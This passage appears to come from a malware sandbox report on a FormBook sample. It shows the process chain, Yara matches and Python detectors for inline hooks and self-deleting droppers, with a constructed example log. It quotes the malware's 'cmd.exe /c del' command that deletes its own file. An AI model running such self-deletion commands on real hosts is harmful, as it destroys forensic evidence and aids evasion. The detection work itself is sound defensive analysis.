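    live[0x1020:0x1026] = bytes([0x48, 0x8B, 0xB8, 0x85, 0x5E, 0xE3])
    return bytes(live)


if __name__ == "__main__":
    for name, kind, target, new in find_inline_hooks(EXPORTS, DISK_IMAGE, patched_live_image(), IMAGE_BASE):
        shown = "-" if target is None else hex(target)
        print(f"{name:<14} INLINE  {kind:<20} target={shown}  new={new}")
```

Two caveats when running this against a real process: compare only after applying the image's relocations to the disk copy, or every absolute reference shows up as a false hook, and treat a hook target that resolves to unbacked (non-image) memory as the strongest signal, since that is where an injected payload lives.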

Statistics

Behavior

System Behavior

General

Start time: 21:25:31
Start date: 13/01/2021
Path: C:\Users\user\Desktop\Inv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Inv.exe'
Imagebase: 0x1230000
File size: 333824 bytes
MD5 hash: A3ABA7D40DA6C8C86E4E8D035803F314
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 21:25:34
Start date: 13/01/2021
Path: C:\Users\user\Desktop\Inv.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\Inv.exe'
Imagebase: 0x1230000
File size: 333824 bytes
MD5 hash: A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:21:25:37
                                              Start date:13/01/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\autofmt.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autofmt.exe
                                              Imagebase:0x1080000
                                              File size:831488 bytes
                                              MD5 hash:7FC345F685C2A58283872D851316ACC4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Imagebase:0x3f0000
                                              File size:32768 bytes
                                              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
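The process list above shows the shape of the infection chain: the dropper run from the user's Desktop, a second instance of the same binary three seconds later, SysWOW64 utilities started with nothing but their own path as the command line, and finally cmd.exe deleting the original file. The Python below is added as an example of turning that shape into detection logic over process-creation events; it is not part of the sandbox report. The sample events are constructed for the example and modelled on the images listed above: the report gives no PIDs or parent PIDs, so the tree shape, PIDs and the extra notepad.exe line are invented.

```python
"""Correlate process-creation events into the self-deleting dropper pattern:
a user-path executable, a relaunch of the same binary by its first instance,
bare-command-line system utilities, and cmd.exe /c del against the original.

Example code added to the report. SAMPLE_LOG is CONSTRUCTED: the report does not
list PIDs or parents, so the tree below is illustrative, not sandbox data."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class SelfDelete:
    deleter: ProcEvent        # the cmd.exe event issuing "del"
    target: str               # path being deleted
    origin: ProcEvent         # earliest launch of that same path in the log
    chain: List[ProcEvent]    # deleter and its ancestors, nearest first


# Constructed sample (time|pid|ppid|image|cmdline), modelled on the report's images.
SAMPLE_LOG = r"""
21:25:31|1001|800|C:\Users\user\Desktop\Inv.exe|"C:\Users\user\Desktop\Inv.exe"
21:25:34|1002|1001|C:\Users\user\Desktop\Inv.exe|"C:\Users\user\Desktop\Inv.exe"
21:25:50|1003|1002|C:\Windows\SysWOW64\NETSTAT.EXE|C:\Windows\SysWOW64\NETSTAT.EXE
21:25:54|1004|1003|C:\Windows\SysWOW64\cmd.exe|/c del "C:\Users\user\Desktop\Inv.exe"
21:25:54|1005|1004|C:\Windows\System32\conhost.exe|C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
21:26:10|1006|800|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
"""

USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\", re.I)
DEL_CMD = re.compile(r"""/c\s+del\s+["']?(?P<path>.+?)["']?\s*$""", re.I)
BARE_UTILITIES = {"netstat.exe", "autofmt.exe"}   # utilities seen in this report


def parse_events(text: str) -> List[ProcEvent]:
    events = []
    for line in text.strip().splitlines():
        ts, pid, ppid, image, cmdline = line.split("|", 4)
        events.append(ProcEvent(datetime.strptime(ts, "%H:%M:%S"), int(pid), int(ppid), image, cmdline))
    return sorted(events, key=lambda e: (e.ts, e.pid))


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Follow parent links present in the log; stop at an unknown or repeated PID."""
    chain, seen = [ev], {ev.pid}
    while chain[-1].ppid in by_pid and chain[-1].ppid not in seen:
        parent = by_pid[chain[-1].ppid]
        chain.append(parent)
        seen.add(parent.pid)
    return chain


def find_self_delete(events: List[ProcEvent]) -> List[SelfDelete]:
    """cmd.exe /c del whose target ran earlier in the same log."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if not ev.image.lower().endswith("\\cmd.exe"):
            continue
        m = DEL_CMD.search(ev.cmdline)
        if not m:
            continue
        target = m.group("path").strip()
        earlier = [e for e in events if e.ts <= ev.ts and e.image.lower() == target.lower()]
        if earlier:
            hits.append(SelfDelete(ev, target, earlier[0], ancestry(ev, by_pid)))
    return hits


def find_relaunch(events: List[ProcEvent], window: timedelta = timedelta(seconds=10)) -> List[Tuple[ProcEvent, ProcEvent]]:
    """A user-path binary started again by its own first instance within `window`,
    the footprint a suspended child created for hollowing leaves behind."""
    pairs = []
    for first in events:
        if not USER_WRITABLE.match(first.image):
            continue
        for second in events:
            if (second.ppid == first.pid and second.image.lower() == first.image.lower()
                    and timedelta(0) <= second.ts - first.ts <= window):
                pairs.append((first, second))
    return pairs


def bare_utility_launches(events: List[ProcEvent]) -> List[ProcEvent]:
    """System utilities whose entire command line is just their own path."""
    out = []
    for ev in events:
        name = ev.image.rsplit("\\", 1)[-1].lower()
        if name in BARE_UTILITIES and ev.cmdline.strip().strip('"').lower() == ev.image.lower():
            out.append(ev)
    return out


def summarize(events: List[ProcEvent]) -> dict:
    return {
        "self_delete": [(h.deleter.pid, h.target, [e.pid for e in h.chain]) for h in find_self_delete(events)],
        "relaunch": [(a.pid, b.pid) for a, b in find_relaunch(events)],
        "bare_utility": [e.pid for e in bare_utility_launches(events)],
    }


if __name__ == "__main__":
    import pprint
    pprint.pprint(summarize(parse_events(SAMPLE_LOG)))
```

On a real host the same three checks run over Sysmon event ID 1 or Windows 4688 records with the parent PID field populated; the self-delete rule is the strongest single signal, because legitimate installers rarely remove their own executable through cmd.exe from a child of a system utility, and walking the ancestry from that cmd.exe back to the first user-path launch recovers every process that should be collected before the dropper is gone.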

                                              Disassembly

                                              Code Analysis
